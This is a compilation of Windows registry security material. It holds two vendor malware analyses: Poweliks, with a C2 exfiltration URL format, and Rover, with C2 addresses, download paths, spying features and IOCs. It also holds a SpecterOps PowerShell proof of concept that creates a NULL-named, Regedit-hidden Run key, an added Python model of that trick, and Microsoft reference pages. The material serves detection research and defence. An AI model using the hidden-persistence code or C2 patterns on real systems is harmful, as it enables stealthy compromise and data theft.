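        print(f"{label:13s} -> {rules or ['no finding']}")
```

Feed real records by exporting the Security log as XML (each `<Event>` goes through parse_4657) and tune SCRIPT_HOST and BASE64_BLOB to the environment's baseline; the rule names are the only contract the output has with a SIEM.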
Reghide - Windows Sysinternals | Microsoft Docs
Reghide (01/11/2006, 2 minutes to read). Published: November 1, 2006.
Download RegHide (38 KB). Run now from Sysinternals Live.

Introduction
A subtle but significant difference between the Win32 API and the Native API (see Inside the Native API for more information on this largely undocumented interface) is the way that names are described. In the Win32 API strings are interpreted as NULL-terminated ANSI (8-bit) or wide character (16-bit) strings. In the Native API names are counted Unicode (16-bit) strings. While this distinction is usually not important, it leaves open an interesting situation: there is a class of names that can be referenced using the Native API, but that cannot be described using the Win32 API.

Runs on: Client: Windows Vista and higher. Server: Windows Server 2008 and higher.
POWELIKS: Malware Hides In Windows Registry
TrendLabs Security Intelligence Blog (Trend Micro). Posted on August 1, 2014 at 4:50 am, in Malware. Author: Roddell Santos (Threats Analyst)

We spotted a malware that hides all of its malicious code in the Windows Registry. This tactic gives the malware, which Trend Micro detects as TROJ_POWELIKS.A, both evasion and stealth. When executed, TROJ_POWELIKS.A downloads files that can cause further system infection, and it can steal system information that cybercriminals may use to launch other attacks.

Evasion Mechanism
Apart from stealth, keeping the code in the Registry also complicates forensics, because there are no file references to recover. Threats try as far as possible to avoid detection on the system and the network so that they can carry out further malicious activity. Based on our analysis, TROJ_POWELIKS checks whether Windows PowerShell is installed on the affected system and, if not, downloads and installs it; PowerShell is used later to execute the encoded script file.
PowerShell then runs the encoded script, which contains the malware's executable code (a .DLL) responsible for downloading other malicious files onto the infected system. This is part of the evasion tactic: the payload is never executed directly from disk by Windows or by any application. The malware then creates an autostart entry whose value name begins with a NULL character, using the native API ZwSetValueKey (screenshot in the original post). This is not a new technique and is documented on MSDN. Because Win32-based tools such as Regedit treat the NULL as the end of the name, users cannot see the content of the entry; the option to delete it is present, but deleting it simply fails with an error. The entry nonetheless executes normally on restart. In short, users can neither see nor delete the entry, so the malware runs again on every reboot.

It also creates another Registry entry that contains the malware code (shown in the original post). This Registry data is an encoded file; after several rounds of decoding, a .DLL file is recovered. This .DLL is injected into the legitimate DLLHOST.EXE process. The injected code is capable of downloading other malware, further compromising the system, and steals the following information from the affected system:
- Operating system and architecture
- UUID
- Malware version
- Build date

This information is sent via an HTTP POST using the following format:
http://178[dot]89[dot]159[dot]34/q/type={status: start, install, exist, cmd or low}&version=1.0&aid={id}&builddate=%s&id={iuuid}&os={OS version}_{OS architecture}

We detect the .EXE and .DLL files as TROJ_POWELIKS.A and the encoded script as JS_POWELIKS.A.
The hashes used in this threat are:
EXE: BFA2DC3B9956A88A2E56BD6AB68D1F4F675A425A
DLL: 3506CE5C88EE880B404618D7759271DED72453FE

Impact to the Threat Landscape
Cybercriminals often use new tactics and techniques to avoid detection on the system and remain under the radar. These range from simple hidden-file attributes to advanced rootkit technology. In the past, we blogged about attacks that exhibit various notable evasion tactics:
- use of the Tor network
- abuse of the Windows PowerShell feature
- averting the execution of analysis tools
- disguising network traffic
- domain generation algorithm (DGA) tactics seen in DOWNAD

Notable malware such as EMOTET and MORTO also leveraged the Registry in the same way. EMOTET, which sniffs network activity for information theft, keeps its PE component in the Registry; its downloaded files are located in Registry entries, and the encrypted stolen information is stored there as well. MORTO, for its part, was stored encrypted in the Registry. While abusing the Windows Registry is no longer new, it indicates that cybercriminals and attackers are continuously improving their "arsenal" of malware so as to go undetected and to carry out more malicious activity without the user's knowledge. Using the Registry for evasion is significant because a file-based AV solution won't be able to detect anything malicious running on the system, and unsuspecting users won't necessarily check the Registry but will rather look for suspicious files or folders. We surmise that in the future we may see other malware sporting the same routines as AV security continues to improve. Trend Micro protects users from this threat via its Smart Protection Network, which detects the malicious file despite its evasion tactics.

With additional analysis from Rhena Inocencio.
Hiding Registry keys with PSReflect
Brian Reitz (Posts By SpecterOps Team Members), Jul 14, 2017 · 7 min read

Introduction and Background
Recently, I wanted to test detection of different kinds of registry persistence used by malware and APT groups. The Windows registry is a particularly interesting area for blue team detection as "fileless" techniques become more prevalent. One technique that has stuck in my mind is a persistence trick used by the Kovter malware family, as detailed in a September 2015 report from Symantec and analyzed by MalwareBytes, Airbus Cybersecurity, and Reaqta. Kovter and its predecessor Poweliks use mshta to execute code stored in registry keys and values. To persist between reboots, Kovter uses a Run key value, but with a small twist: the value name starts with a null character (\0), followed by random characters. The null character causes an error when attempting to read the value with Regedit and other tools that expect a null-terminated string. Using a null character in a value name to hide from Regedit has been known since at least 2005, and Mark Russinovich previously released a tool called RegHide as part of the Sysinternals Suite as a proof of concept. The old Sysinternals page described why this null-character trick works:

"In the Win32 API strings are interpreted as NULL-terminated ANSI (8-bit) or wide character (16-bit) strings. In the Native API names are counted Unicode (16-bit) strings. While this distinction is usually not important, it leaves open an interesting situation: there is a class of names that can be referenced using the Native API, but that cannot be described using the Win32 API. […] When a key (or any other object with a name such as a named Event, Semaphore or Mutex) is created with such a name any applications using the Win32 API will be unable to open the name, even though they might seem to see it."

A question on StackOverflow was also extremely helpful in explaining the differences between calling the Win32 API and calling the Native API.

(Screenshot in the original post: Regedit shows an error when trying to display a key value with a null character in its name.)

With PSReflect, we can call the Native API through ntdll.dll from a PowerShell script, so we can implement our own version of RegHide and test our detection capability for Kovter-style value names. To follow along with the completed script, see the PSReflect-RegHide gist.

Enumerations, structures, and function definitions
As a proof of concept, let's create a Run key value like Kovter does: under HKCU:\Software\Microsoft\Windows\CurrentVersion\Run we'll create a value named "\0abcd" with the data "mshta javascript:alert(1)", which should pop up an alert box at user logon. According to the MSDN article on Registry Key Object Routines, we need at least three calls to write our hidden value: NtOpenKey to open a handle to the key, NtSetValueKey to write the value, and NtClose to close the key handle. PSReflect provides helper functions that make it easy to translate the documented C definitions into PowerShell. We'll define the enums and structs needed for these calls first. From MSDN, NtOpenKey requires the ACCESS_MASK enum and the OBJECT_ATTRIBUTES struct (which itself requires an attributes enum), and NtSetValueKey requires the UNICODE_STRING struct. Let's look at how to convert UNICODE_STRING into a PSReflect struct.
We can "translate" the C data types into PowerShell types: a USHORT, an unsigned 16-bit integer, becomes a UInt16, and a pointer to a WSTR becomes an IntPtr. For the ACCESS_MASK enum, the DWORD becomes a UInt32.

# The in-memory module PSReflect compiles types into
# (not shown in the post's excerpt; the rest of the script needs it).
$Module = New-InMemoryModule -ModuleName RegHide

# Define our structs.
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
#     USHORT Length;
#     USHORT MaximumLength;
#     PWSTR  Buffer;
# }
$UNICODE_STRING = struct $Module UNICODE_STRING @{
    Length        = field 0 UInt16
    MaximumLength = field 1 UInt16
    Buffer        = field 2 IntPtr
}

# And our ACCESS_MASK
$KEY_ACCESS = psenum $Module KEY_ACCESS UInt32 @{
    KEY_QUERY_VALUE        = 0x0001
    KEY_SET_VALUE          = 0x0002
    KEY_CREATE_SUB_KEY     = 0x0004
    KEY_ENUMERATE_SUB_KEYS = 0x0008
    KEY_NOTIFY             = 0x0010
    KEY_CREATE_LINK        = 0x0020
    KEY_WOW64_64KEY        = 0x0100
    KEY_WOW64_32KEY        = 0x0200
    KEY_WRITE              = 0x20006
    KEY_READ               = 0x20019
    KEY_EXECUTE            = 0x20019
    KEY_ALL_ACCESS         = 0xF003F
} -Bitfield

# OBJECT_ATTRIBUTES and its attribute flags, used by NtOpenKey below
# (not shown in the post's excerpt; values from the Windows headers).
$OBJ_ATTRIBUTE = psenum $Module OBJ_ATTRIBUTE UInt32 @{
    OBJ_INHERIT          = 0x00000002
    OBJ_PERMANENT        = 0x00000010
    OBJ_EXCLUSIVE        = 0x00000020
    OBJ_CASE_INSENSITIVE = 0x00000040
    OBJ_OPENIF           = 0x00000080
    OBJ_KERNEL_HANDLE    = 0x00000200
} -Bitfield

$OBJECT_ATTRIBUTES = struct $Module OBJECT_ATTRIBUTES @{
    Length                   = field 0 UInt32
    RootDirectory            = field 1 IntPtr
    ObjectName               = field 2 IntPtr   # PUNICODE_STRING
    Attributes               = field 3 UInt32
    SecurityDescriptor       = field 4 IntPtr
    SecurityQualityOfService = field 5 IntPtr
}

Next, we'll define the functions we want to import from ntdll to write to the Registry: NtOpenKey, NtSetValueKey, and NtClose. We specify the DLL name, ntdll, and the entry point of the exported function we want, such as NtOpenKey. Again, we "translate" the types from the C definitions on MSDN into the equivalent PowerShell types: HANDLE becomes IntPtr and ULONG becomes a 32-bit integer, while for pointer types such as PHANDLE and PUNICODE_STRING we use MakeByRefType() to pass by reference. Notice that we can use the structs we defined previously (such as UNICODE_STRING).
$FunctionDefinitions = @(
    (func ntdll NtOpenKey ([UInt32]) @(
        [IntPtr].MakeByRefType(),            # _Out_ PHANDLE KeyHandle
        [Int32],                             # _In_ ACCESS_MASK DesiredAccess
        $OBJECT_ATTRIBUTES.MakeByRefType()   # _In_ POBJECT_ATTRIBUTES ObjectAttributes
    ) -EntryPoint NtOpenKey),

    (func ntdll NtSetValueKey ([UInt32]) @(
        [IntPtr],                            # _In_ HANDLE KeyHandle
        $UNICODE_STRING.MakeByRefType(),     # _In_ PUNICODE_STRING ValueName
        [Int32],                             # _In_opt_ ULONG TitleIndex
        [Int32],                             # _In_ ULONG Type
        [IntPtr],                            # _In_opt_ PVOID Data
        [Int32]                              # _In_ ULONG DataSize
    ) -EntryPoint NtSetValueKey),

    (func ntdll NtClose ([UInt32]) @(
        [IntPtr]                             # _In_ HANDLE ObjectHandle
    ) -EntryPoint NtClose),

    # RtlInitUnicodeString is called later in the script but was not in the
    # excerpt's definitions; added here so the calls below resolve.
    (func ntdll RtlInitUnicodeString ([Void]) @(
        $UNICODE_STRING.MakeByRefType(),     # _Out_ PUNICODE_STRING DestinationString
        [String]                             # _In_opt_ PCWSTR SourceString
    ) -EntryPoint RtlInitUnicodeString -Charset Unicode)
)

$Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace RegHide
$ntdll = $Types['ntdll']   # the post had $Type['ntdll'], which is never defined

(The original listing also had a trailing comma after the NtClose entry, which PowerShell rejects inside @( ).)

After calling Add-Win32Type, we have access to these Native API functions in PowerShell as PowerShell methods:

PS C:\Users\brian> $ntdll::NtOpenKey | fl

MemberType          : Method
OverloadDefinitions : {static uint32 NtOpenKey([ref] System.IntPtr , int , [ref] OBJECT_ATTRIBUTES )}
TypeNameOfValue     : System.Management.Automation.PSMethod
Value               : static uint32 NtOpenKey([ref] System.IntPtr , int , [ref] OBJECT_ATTRIBUTES )
Name                : NtOpenKey
IsInstance          : True

Creating the Autorun key
Let's set up the arguments needed to open a key. While making a KeyHandle (an empty IntPtr) and an ACCESS_MASK (an Int32) is straightforward, creating an OBJECT_ATTRIBUTES struct takes a bit of setup that is normally handled by a macro.
Let's take care of the easy part first:

# Create our OBJECT_ATTRIBUTES structure.
# We don't have the InitializeObjectAttributes macro, but we can do it manually.
$ObjectAttributes = [Activator]::CreateInstance($OBJECT_ATTRIBUTES)
$ObjectAttributes.Length = $OBJECT_ATTRIBUTES::GetSize()
$ObjectAttributes.RootDirectory = [IntPtr]::Zero
$ObjectAttributes.Attributes = $OBJ_ATTRIBUTE::OBJ_CASE_INSENSITIVE
# These are set to NULL for default security settings (mirrors the InitializeObjectAttributes macro).
$ObjectAttributes.SecurityDescriptor = [IntPtr]::Zero
$ObjectAttributes.SecurityQualityOfService = [IntPtr]::Zero

Our ObjectName specifies the registry key we want to open, i.e. HKCU:\Software\Microsoft\Windows\CurrentVersion\Run. The native object name for HKCU has the form \Registry\User\<SID>, so we'll have to insert the current user's SID and build a UNICODE_STRING from the result. The ObjectName field takes a pointer to a UNICODE_STRING, so we'll have to allocate unmanaged memory for the struct and copy it there as well.

# To open the current user's registry hive, we need the user's SID
$SID = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$KeyName = "\Registry\User\$SID\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Convert the KeyName from a PowerShell string into a UNICODE_STRING
$KeyBuffer = [Activator]::CreateInstance($UNICODE_STRING)
$ntdll::RtlInitUnicodeString([ref]$KeyBuffer, $KeyName)

# Here we need a pointer to the UNICODE_STRING we just initialised.
$ObjectAttributes.ObjectName = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($UNICODE_STRING::GetSize())
[System.Runtime.InteropServices.Marshal]::StructureToPtr($KeyBuffer, $ObjectAttributes.ObjectName, $true)

Now we have all the arguments we need, so we can call $ntdll::NtOpenKey.
# KeyHandle receives the opened handle; DesiredAccess only needs KEY_SET_VALUE
# for what follows (these two lines are not in the post's excerpt).
$KeyHandle = [IntPtr]::Zero
$DesiredAccess = $KEY_ACCESS::KEY_SET_VALUE

$status = $ntdll::NtOpenKey([ref]$KeyHandle, $DesiredAccess, [ref]$ObjectAttributes)

Once we have a key handle, we can pass $KeyHandle to other functions such as NtSetValueKey or NtClose. Closing the handle is a single call:

$status = $ntdll::NtClose($KeyHandle)

After opening the handle to the Run key, our next step is to add the hidden value so that our "payload" runs at logon. To call NtSetValueKey we need the key handle plus the value name, its type, and the value data. While we previously used RtlInitUnicodeString to initialise our UNICODE_STRINGs, here we fill in the structure by hand so that we can put a null character in the string. RtlInitUnicodeString takes a null-terminated source string, so, just like the Win32 API, it stops at the first \0 when computing the length; by setting Length and Buffer ourselves we can put whatever characters we like into the value name.

$ValueName = "`0abcd"
$ValueData = "mshta javascript:alert(1)"

$ValueNameBuffer = [Activator]::CreateInstance($UNICODE_STRING)
$ValueDataBuffer = [Activator]::CreateInstance($UNICODE_STRING)

# Length and MaximumLength are byte counts: 2 bytes per UTF-16 character.
# Setting them by hand is what lets the leading null survive.
$ValueNameBuffer.Length = $ValueName.Length * 2
$ValueNameBuffer.MaximumLength = $ValueName.Length * 2
$ValueNameBuffer.Buffer = [System.Runtime.InteropServices.Marshal]::StringToCoTaskMemUni($ValueName)

# ValueData doesn't contain any `0 characters, so RtlInitUnicodeString is fine here
$ntdll::RtlInitUnicodeString([ref]$ValueDataBuffer, $ValueData)

# Fill out the remaining parameters for NtSetValueKey
$ValueType = 0x00000001   # REG_SZ
# "Device and intermediate drivers should set TitleIndex to zero."
$TitleIndex = 0

# REG_SZ data is stored with its terminating null, so DataSize is Length + 2.
# (The post passed Length alone, which stores an unterminated string.)
$status = $ntdll::NtSetValueKey($KeyHandle, [ref]$ValueNameBuffer, $TitleIndex, $ValueType, $ValueDataBuffer.Buffer, ($ValueDataBuffer.Length + 2))

After calling NtSetValueKey with these arguments, our hidden Run value exists.
RegEdit will throw an error when viewing the key, while reg query and PowerShell\xe2\x80\x99s Get-ItemProperty won\xe2\x80\x99t return a value hidden in this way. However, using the Autoruns tool from Sysinternals, we can see (and delete) the value we just created: Conclusion So why bother implementing a trick to obfuscate a registry value that isn\xe2\x80\x99t truly hidden? In my opinion it\xe2\x80\x99s important to examine what techniques various malware and APT tools use, as well as their implementations, so we can understand exactly how to detect and remediate these TTPs. While writing a registry key value name with a null character is a relatively simple example, it\xe2\x80\x99s also a good introduction to how PSReflect makes Native and Win32 API access easy in PowerShell. I wrote the rest of the NtXxxKey routines (NtCreateKey, NtQueryKey, NtQueryValueKey, NtEnumerateKey, NtEnumerateValueKey, NtDeleteKey, and NtDeleteValueKey) and added them to the PSReflect-Functions repo, which maintains a growing number of useful Win32 functions as a PowerShell module. Full source of PSReflect-RegHide.ps1 Cybersecurity Powershell 23 claps Brian Reitz WRITTEN BY Brian Reitz Follow Threat Detection at SpecterOps Posts By SpecterOps Team Members Posts By SpecterOps Team Members Follow Posts from SpecterOps team members on various topics relating information security Write the first response Discover Medium Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch Make Medium yours Follow all the topics you care about, and we\xe2\x80\x99ll deliver the best stories for you to your homepage and inbox. Explore Become a member Get unlimited access to the best stories on Medium \xe2\x80\x94 and support writers while you\xe2\x80\x99re at it. Just $5/month. Upgrade About Help Legal To make Medium work, we log user data. 
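The two string conventions quoted from the Sysinternals page are the whole reason Poweliks' NULL-prefixed autostart entry and the Kovter-style value written above survive Regedit, reg query and Get-ItemProperty, and the mechanism can be reproduced without touching a registry. The following Python is an added example, not code from this post, from Trend Micro or from Sysinternals: it packs a value name into the counted UNICODE_STRING layout that NtSetValueKey receives (the x64 field layout is assumed), then decodes the same buffer both as the Native API does and as a Win32 consumer does. The reg_sz_data helper is the editor's addition showing the DataSize a REG_SZ write should carry.

```python
"""Counted UNICODE_STRING versus NUL-terminated wide string.

Added example (not from the SpecterOps post, Trend Micro or Sysinternals).
It models why a value name that begins with \\0 can be written through
NtSetValueKey yet cannot be addressed by Regedit, reg query or
Get-ItemProperty, which all go through the Win32 registry API.
"""
import struct

# UNICODE_STRING on x64: USHORT Length, USHORT MaximumLength, 4 bytes of
# padding, then the PWSTR Buffer pointer (16 bytes total). Assumed layout.
UNICODE_STRING_FMT = "<HH4xQ"


def pack_unicode_string(name, buffer_address):
    """Build the (header, buffer) pair NtSetValueKey is handed for ValueName.

    Length and MaximumLength are byte counts of UTF-16LE text: this is the
    $ValueName.Length * 2 the PowerShell above sets by hand, and it is what
    lets an embedded NUL survive. buffer_address stands in for the IntPtr
    that the Buffer field would hold.
    """
    buf = name.encode("utf-16-le")
    header = struct.pack(UNICODE_STRING_FMT, len(buf), len(buf), buffer_address)
    return header, buf


def native_name(header, buffer):
    """Native API view: read exactly Length bytes, NULs included."""
    length, _maximum, _pointer = struct.unpack(UNICODE_STRING_FMT, header)
    return buffer[:length].decode("utf-16-le")


def win32_name(buffer):
    """Win32 view: a wide C string ends at the first 16-bit NUL."""
    end = 0
    while end + 1 < len(buffer) and buffer[end:end + 2] != b"\x00\x00":
        end += 2
    return buffer[:end].decode("utf-16-le")


def hidden_from_win32(name):
    """True when the two views disagree: Win32 tools cannot address this name."""
    header, buf = pack_unicode_string(name, 0)
    return native_name(header, buf) != win32_name(buf)


def find_win32_invisible(value_names):
    """Filter an NtEnumerateValueKey-style listing down to the names that a
    Win32-based cleanup (reg delete, Remove-ItemProperty) would miss."""
    return [n for n in value_names if hidden_from_win32(n)]


def reg_sz_data(value):
    """(bytes, DataSize) for writing `value` as REG_SZ through NtSetValueKey.

    REG_SZ is stored with its terminating NUL, so DataSize must be the
    UTF-16LE length plus 2; passing only the text length stores an
    unterminated string that some readers will mis-handle.
    """
    data = value.encode("utf-16-le") + b"\x00\x00"
    return data, len(data)


if __name__ == "__main__":
    kovter_style = "\0abcd"
    header, buf = pack_unicode_string(kovter_style, 0x7FF6_1234_0000)
    print("native sees :", repr(native_name(header, buf)))
    print("win32 sees  :", repr(win32_name(buf)))
    print("hidden      :", find_win32_invisible(["Updater", kovter_style, "OneDrive"]))
    print("REG_SZ size :", reg_sz_data("mshta javascript:alert(1)")[1])
```

The win32 view of "\0abcd" is the empty string, which is why Regedit shows an error rather than the name and why a Win32 delete has nothing to address; Autoruns and RegDelNull work because they enumerate through the Native API and compare the counted length against what the C-string view returns, exactly as find_win32_invisible does.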
Enable the Remote Registry Service | Microsoft Docs
11/17/2009, 2 minutes to read
Applies To: Windows 7, Windows Server 2008 R2

A registry key value tells Shutdown Event Tracker when to prompt a user for information about an unexpected restart or shutdown. Without remote registry access, Shutdown Event Tracker cannot remotely reset this registry key value after you have provided a reason.

Membership in the local Administrators group, or equivalent, on the remote computer is the minimum required to complete this procedure.

To enable the Remote Registry service
1. On the computer where you want to record Shutdown Event Tracker data, click Start, click in the Start Search box, type services.msc, and then press ENTER. Microsoft Management Console will start with the Services snap-in open.
2. In the console pane, right-click Remote Registry and click Start.

Additional considerations
You must be a member of the local Administrators group, or equivalent, on the remote computer to complete this procedure.

Additional references
Work with Shutdown Event Tracker
Shutdown Event Tracker Overview
For more information about using Microsoft Management Console, see http://go.microsoft.com/fwlink/?linkid=70036.
New Malware 'Rover' Targets Indian Ambassador to Afghanistan
By Vicky Ray and Kaoru Hayashi, February 29, 2016 at 5:00 PM
Category: Malware, Threat Prevention, Unit 42
Tags: OpenAL, OpenCV, Rover, Trojan, VirusTotal

On December 24, 2015, Unit 42 identified a targeted attack, delivered via email, on a high profile Indian diplomat, an Ambassador to Afghanistan. The body and content of the email suggest that it was crafted and spoofed to look like it was sent by the current Defence Minister of India, Mr. Manohar Parrikar, commending the Ambassador on his contributions and success. India has been a key nation in building and funding Afghanistan's infrastructure and economic development, which includes setting up iron ore mines, steel plants, power plants and transportation systems, helping reconstruct the Salma Dam and constructing a new Parliament Complex for the Afghan Government. Given India's significant contributions to the development of Afghanistan, it is likely that there may be groups or nations who would be interested in tracking and spying on key individuals who officially represent India in Afghanistan.

Overview of Rover infection

Figure 1 gives an overview of the exploitation, infection and C2 communications of the 'Rover' Trojan campaign targeting a victim running Windows XP.

Figure 1: Overview of the infection flow and C2 communications

Rover Trojan Infection Steps:
1. RTF file exploits CVE-2010-3333 and downloads an executable from newsumbrella[.]net.
2. The executable file downloaded from newsumbrella[.]net is executed on the victim machine.
3. The executable 'file.exe' is a downloader which calls out to a server with the IP '46.166.165.254' and downloads the main Rover malware along with the plugins it uses.
4. Rover malware and plugins are downloaded and installed on the victim machine.
5. Data is exfiltrated from the victim machine.

Targeting and Infection

Figure 2 shows an email which was sent to the Ambassador of India, appearing to commend the contributions the Ambassador has made to the development and success of projects of national interest, and attaching a letter of appreciation with the file name "Appreciation_letter.doc". The attachment is an RTF file which exploits a specific vulnerability in Microsoft Word, CVE-2010-3333.

Figure 2: Spear phishing email sent to the Ambassador of Afghanistan

If the recipient of the e-mail opened the attachment in a vulnerable version of Word, the exploit code would download and execute a file from the domain newsumbrella[.]net as shown in Figure 3 below.

Figure 3: Hexdump showing the domain and the executable downloaded

Malware Analysis

At the time of analysis the executable file systemupdateAPI.exe was no longer being hosted on the newsumbrella[.]net domain. However, we have noticed the same domain hosting another executable in the past within the same parent directory and with similar folder naming, as shown below:

newsumbrella[.]net/ne3s/lat3st/w0rld/systemupdateAPI[.]exe
newsumbrella[.]net/ne3s/file[.]exe (hosted earlier)

We believe that the executables hosted under the parent directory 'ne3s' are variants of the same downloader Trojan, which was used to download the Rover Trojan. The file, file.exe, contains the following debug information that indicates the file was originally named systemupdateAPI.exe.
Figure 4: Debug information of downloader program

By analyzing file.exe, we can see that it is a downloader which creates the 'c:\system' directory and, depending on the OS version, downloads the main Rover payload along with multiple DLL modules from 46.166.165.254.

Figure 5: Code snippet showing the OS version check and the subsequent download from 46.166.165.254

If the infected system is running an OS version prior to Windows Vista, it downloads the following files from 46.166.165.254:
WindowsSecurityService2.exe ('Rover' main module)
Openal32.dll
Cxcore210.dll (OpenCV)
Highgui210.dll (OpenCV)
libsndfile-1.dll

If the OS version is Windows Vista or later, it downloads the following files from 46.166.165.254:
WindowsSecurityService3.exe ('Rover' main module)
OpenAL32.dll
opencv_world300.dll
msvcp100.dll
msvcp110.dll
msvcp120.dll
msvcr100.dll
msvcr110.dll
msvcr120.dll

After retrieving these files, the downloader Trojan executes the main module. Even though the main modules use different library versions, the functionality of the backdoors is identical. By analyzing the files downloaded to the victim machine, we can see that the executable WindowsSecurityService2.exe imports the four DLL files that were downloaded to the same directory.
The four DLLs are cxcore210.dll, highgui210.dll, OpenAL32.dll and libsndfile-1.dll, as shown in Figure 6.

Figure 6: Executable and DLLs downloaded to the victim machine

Attributes of the Rover variant

##############################################
File: WindowsSecurityService2.exe
##############################################
Meta-data
===============================================
Size         : 337920 bytes
Type         : PE32 executable (console) Intel 80386, for MS Windows
Architecture : 32 Bits binary
MD5          : 76429f8515768f9f5def697e71071f51
SHA1         : d04ce934561934f758d77dfa944bd6743dd82cff
SHA256       : 7757517ae6b4d513a57826f9ab65bd070d99d25ac526cfae3e9955c3c7cd457a
ssdeep       : 6144:JabBRNUKgZ9SN0jzoFBB9hcrpXwg9xXYOGl93XO2rQLfbTpLuO7bIWjRO5gjPNq:JarSKu6yzoF8rpAqXYv3XOgQLfnpLuOu
imphash      : b5aa366f452feb9f4dff3c72157ca1f9
Date         : 0x5637227B [Mon Nov 2 08:44:43 2015 UTC]
Language     : ENGLISH
CRC          : (Claimed) 0x59736, (Actual) 0x59736
Entry Point  : 0x43e3c8 .text 0/5
===============================================
Imports
===============================================
[1] ADVAPI32.dll
[2] WS2_32.dll
[3] WLDAP32.dll
[4] cxcore210.dll (OpenCV module)
[5] highgui210.dll (OpenCV module)
[6] OpenAL32.dll
[7] libsndfile-1.dll
[8] GDI32.dll
[9] KERNEL32.dll
[10] USER32.dll
[11] MSVCP90.dll
[12] RPCRT4.dll
[13] MSVCR90.dll

The author of 'Rover' used the following open source projects to implement the main functionalities of this custom malware.
OpenCV: taking photos from the web cam
OpenAL: recording audio
Libsndfile: C library used for reading and writing audio files
LibCurl: all network communications

OpenCV and OpenAL

Both versions of Rover use OpenCV and OpenAL for some of the main functions. OpenCV is a library of functions written primarily for building real time computer vision applications, image processing and also machine learning. It has seen wide acceptance in security systems, medical image analysis, unmanned vehicles, visual surveillance, object tracking, Artificial Intelligence and many other applications. OpenAL is a cross-platform audio API for rendering multichannel three-dimensional positional audio (i.e., it is a means to generate audio in a three-dimensional space). Earlier versions of OpenAL were open source, but later versions (since v1.1) have been proprietary.

Once executed, Rover creates the following registry entry to execute itself when the computer reboots:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"System Application" = c:\system\WindowsSecurityService[2 or 3].exe

The malware then creates six threads, each with a different job:
Heartbeat
Screenshot
Stealing Files from HDD
Keylogger
Search files on USB
Backdoor

Figure 7: Threads created by the malware

1. Heartbeat: sends a heartbeat signal over HTTP to the C2 server at 46.166.165.254 every five seconds and checks whether the C2 server is running.
2. ScreenShot: saves screenshots as c:\system\screenshot.bmp and sends them to the C2 server at 46.166.165.254 every 60 minutes.

Figure 8: Screenshots sent to C2 server at 46.166.165.254

3. Finding specific file types on Removable Drive: this thread searches for files with the following extensions on removable drives and copies them to 'c:\system' every 5 seconds: pdf, doc, docx, ppt, pptx, xls, xlsx.
4. Keylogger: logs key strokes to 'c:\system\log.txt' and sends the captured data to the C2 every 10 seconds.
5. Stealing specific file types from Hard Drive: this thread searches for files with the following extensions on fixed drives and sends them to the C2 every 60 minutes: pdf, doc, docx, ppt, pptx, xls, xlsx.

Figure 9: Document file being sent to C2

6. Backdoor: this thread obtains backdoor commands from the C2 every 10 seconds and executes them. Backdoor commands are listed below:

Command   Description
CAMERA    Take photos using the system webcam and store them as c:\system\camera.jpg before sending to the C2.
AUDIO     Record audio from the default audio input as c:\system\audio.ogg and send it to the C2.
SCREEN    Take a screenshot and save it as c:\system\screenshot.bmp, then send it to the C2.
KILL      Remove the persistence registry entry and terminate itself.

Though 'Rover' is unsophisticated and lacks many modern features common to advanced malware, its detection rate is extremely low. At the time of this writing, two out of three samples on VirusTotal were not detected by any Antivirus product.

Figure 10: No detection by any AV product on VirusTotal
Figure 11: Low detection rate

Summary

OpenCV has been extensively used by organizations, government bodies, and research groups for real time capture, image manipulation, object detection and many other uses in new forms of Human-Computer interaction, security systems, driver-less cars among many others. OpenCV was also used by the Mars Rovers to send captured data back to Earth. It is interesting to see the very code used in such significant projects also being used to track and spy on targeted individuals while remaining undetected by traditional security systems.
Though 'Rover' is an unsophisticated malware lacking modern malware features, it seems to be successful in bypassing traditional security systems and fulfilling the objectives of the threat actor behind the campaign in exfiltrating information from the targeted victim. It is important to understand the techniques and tools being used by such threat actors to better defend and protect organizations from such threats. Palo Alto Networks AutoFocus users can identify this threat using the Rover tag.

IOCs:

C2: 46.166.165.254

Downloader hosting links:
newsumbrella[.]net/ne3s/lat3st/w0rld/systemupdateAPI[.]exe
newsumbrella[.]net/ne3s/file[.]exe
newsumbrella[.]net/bla3k/extra7/systemupdateAPI[.]exe

Filename                     File Type  SHA256
Appreciation_letter.doc      RTF        6c9862a65741b56b849928300aff310d60b815ee5f5f9f133469e3b035e7e936
Questionnaire.doc            RTF        5f656cf07a1d5e7c439aad40235dc78e47bac719c62e03728cc40267383880bd
Terrorism.doc;India &        RTF        6096ff941af95638944f2fcdf4a5046aa028b803b010b1a2d000028b1a4967bc
Appreciation_ letter.doc     RTF        7bf3a425be41ad9cc713e48216e061c788f36e2727de5d0b6b6ac4f435fe1c06
-                            RTF        06b12649dba7f61cb581f97797bdfba3a7f057a36b448d4c91a3a7d89fff8d54
WindowsSecurityService3.exe  PE         61a2935fcb0a385f9e67855ef6f95bda5f09fdb7c1435f215ce18b7b61993daa
file.exe                     PE         a5e5571cda838e97a6beb1a65acdfbaaf80027f60417aadb0d34292f19c0f3b3
WindowsSecurityService2.exe  PE         7757517ae6b4d513a57826f9ab65bd070d99d25ac526cfae3e9955c3c7cd457a
WindowsSecurityService3.exe  PE         3dc709a3bcaa82220d6a76ea47374bd864c37817c7041c7e9f4ee8ba42847f34
4657(S): A registry value was modified. (Windows 10) | Microsoft Docs
04/19/2017, 4 minutes to read
Applies to: Windows 10, Windows Server 2016

Subcategory: Audit Registry

Event Description:

This event generates when a registry key value was modified. It doesn't generate when a registry key was modified. This event generates only if "Set Value" auditing is set in the registry key's SACL.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML (field values):
EventID: 4657, Version: 0, Level: 0, Task: 12801, Opcode: 0, Keywords: 0x8020000000000000, EventRecordID: 744725, Channel: Security, Computer: DC01.contoso.local
Security ID: S-1-5-21-3457937927-2839227994-823803824-1104
Account Name: dadmin
Account Domain: CONTOSO
Logon ID: 0x364eb
Object Name: \REGISTRY\MACHINE
Object Value Name: Name_New
Handle ID: 0x54
Operation Type: %%1905
Old Value Type: %%1873
Old Value: (empty)
New Value Type: %%1873
New Value: Andrei
Process ID: 0xce4
Process Name: C:\Windows\regedit.exe

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
